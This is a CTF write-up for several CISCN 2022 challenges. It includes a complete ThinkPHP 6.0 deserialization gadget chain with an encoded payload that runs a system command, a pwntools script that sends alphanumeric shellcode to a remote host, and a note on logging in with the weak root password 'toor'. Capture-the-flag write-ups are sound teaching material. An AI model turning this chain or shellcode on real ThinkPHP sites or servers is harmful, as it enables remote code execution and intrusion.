CISCN 2022 Partial Questions WP

Original link: https://5ime.cn/ciscn-2022.html

I feel that this year's questions were simpler than last year's, and the three Crypto challenges had unintended solves. A good friend helped me with the 150 multiple-choice questions, and I logged off after doing six CTF challenges~

Misc

Sign-in Radio Station

First, as the challenge description says, send the keyword to the official WeChat account to get the hint.

Open the challenge environment and find the codebook; according to the official account's hint, the 7×4 numbers are its first 28 digits.

Switch to pure-number mode and take the first 28 digits:

 1272685121234614783219665440

Then the message 弼时安全到达了 ("Bishi has arrived safely") in Chinese telegraph code is:

 1732 2514 1344 0356 0451 6671 0055

First send a GET request to start the telegraph:

 /send?msg=s

Then send a GET request with the 28 digits obtained by adding the codebook digits to the telegraph code digit by digit, modulo 10:

 /send?msg=2904836534674960728375375495
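The modulo-10 step above, as an added example that is not code from the original writeup: the 28 codebook digits act as a one-time-pad key over the telegraph code (digit-wise addition mod 10), and the inverse subtraction recovers the 7×4 groups. The function names are my own; the digit strings are the ones quoted above.

```python
# Added example, not code from the original writeup: the sign-in station step
# treated as a digit-wise one-time pad. The key and telegraph code are the
# values quoted above; the output must equal the msg sent in the final request.
CODEBOOK_KEY = "1272685121234614783219665440"           # first 28 digits of the codebook
TELEGRAPH_CODE = "1732 2514 1344 0356 0451 6671 0055"   # 弼时安全到达了 in telegraph code
EXPECTED_MSG = "2904836534674960728375375495"           # msg from the writeup's last GET

def digits_only(s: str) -> str:
    """Strip the 4-digit grouping (spaces) so both strings are pure digit runs."""
    return "".join(ch for ch in s if ch.isdigit())

def otp_add_mod10(key: str, plain: str) -> str:
    """Encrypt: add key and plaintext digit by digit, modulo 10 (no carries)."""
    key, plain = digits_only(key), digits_only(plain)
    if len(key) != len(plain):
        raise ValueError(f"key has {len(key)} digits, plaintext has {len(plain)}")
    return "".join(str((int(k) + int(p)) % 10) for k, p in zip(key, plain))

def otp_sub_mod10(key: str, cipher: str) -> str:
    """Decrypt: subtract the key digit by digit, modulo 10; inverse of otp_add_mod10."""
    key, cipher = digits_only(key), digits_only(cipher)
    if len(key) != len(cipher):
        raise ValueError(f"key has {len(key)} digits, ciphertext has {len(cipher)}")
    return "".join(str((int(c) - int(k)) % 10) for k, c in zip(key, cipher))

def telegraph_groups(digits: str) -> list[str]:
    """Regroup a digit run into the 4-digit Chinese telegraph code groups."""
    return [digits[i:i + 4] for i in range(0, len(digits), 4)]

def send_path(msg: str) -> str:
    """Path of the station's GET endpoint as used in the writeup (string only, no request made)."""
    return f"/send?msg={msg}"

if __name__ == "__main__":
    cipher = otp_add_mod10(CODEBOOK_KEY, TELEGRAPH_CODE)
    print(send_path("s"))                                        # start the telegraph
    print(send_path(cipher))                                     # 2904836534674960728375375495
    print(telegraph_groups(otp_sub_mod10(CODEBOOK_KEY, cipher)))  # back to the 7 groups
```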

WEB

ezpop

The target runs ThinkPHP 6.0, so an existing exploit chain can be found on Baidu (ThinkPHP 6.0 deserialization chain audit and analysis: https://forum.butian.net/share/1168); we only need to find the deserialization point. A dirsearch scan turns up a www.zip file, and the index.php controller contains the deserialization point.

 <?php
 namespace think {
     use think\route\Url;
     abstract class Model
     {
         private $lazySave;
         private $exists;
         protected $withEvent;
         protected $table;
         private $data;
         private $force;
         public function __construct()
         {
             $this->lazySave = true;
             $this->withEvent = false;
             $this->exists = true;
             $this->table = new Url();
             $this->force = true;
             $this->data = ["1"];
         }
     }
 }
 namespace think\model {
     use think\Model;
     class Pivot extends Model
     {
         function __construct()
         {
             parent::__construct();
         }
     }
     $b = new Pivot();
     echo urlencode(serialize($b));
 }
 namespace think\route {
     use think\Middleware;
     use think\Validate;
     class Url
     {
         protected $url;
         protected $domain;
         protected $app;
         protected $route;
         public function __construct()
         {
             $this->url = 'a:';
             $this->domain = "<?php system('cat /flag.txt');?>";
             $this->app = new Middleware();
             $this->route = new Validate();
         }
     }
 }
 namespace think {
     use think\view\driver\Php;
     class Validate
     {
         public function __construct()
         {
             $this->type['getDomainBind'] = [new Php(), 'display'];
         }
     }
     class Middleware
     {
         public function __construct()
         {
             $this->request = "sp4c1ous";
         }
     }
 }
 namespace think\view\driver {
     class Php
     {
         public function __construct()
         {
         }
     }
 }

payload

 // ?s=index/test or /index.php/index/test
 a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D

Crypto

Challenge-code-based two-way authentication (基于挑战码的双向认证) & challenge-code-based two-way authentication 2 (基于挑战码的双向认证2)

SSH in directly and search for the flag files:

 find / -name 'flag*'
 cat /root/cube-shell/instance/flag_server/flag*

The first flag is for 基于挑战码的双向认证, the second one for 基于挑战码的双向认证2.

Challenge-code-based two-way authentication 3 (基于挑战码的双向认证3)

Unintended solve: the account uses the weak password root:toor.

 cat /root/cube-shell/instance/flag_server/flag*

PWN

login-nomal

In main, follow the call into sub_FFD().

It clearly executes the supplied data as shellcode (sc).

 from pwn import *
 context.arch = 'amd64'
 context.log_level = 'debug'
 # p = process('./login')
 p = remote('123.56.87.204', 36979)
 # log in with the username first
 pl = "msg:ro0tt\nopt:1\n"
 p.sendlineafter(">>", pl)
 # the "key" string is what sub_FFD() ends up executing as shellcode
 key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
 pl = "msg:" + key + "\nopt:2\n"
 p.sendlineafter(">>", pl)
 p.interactive()
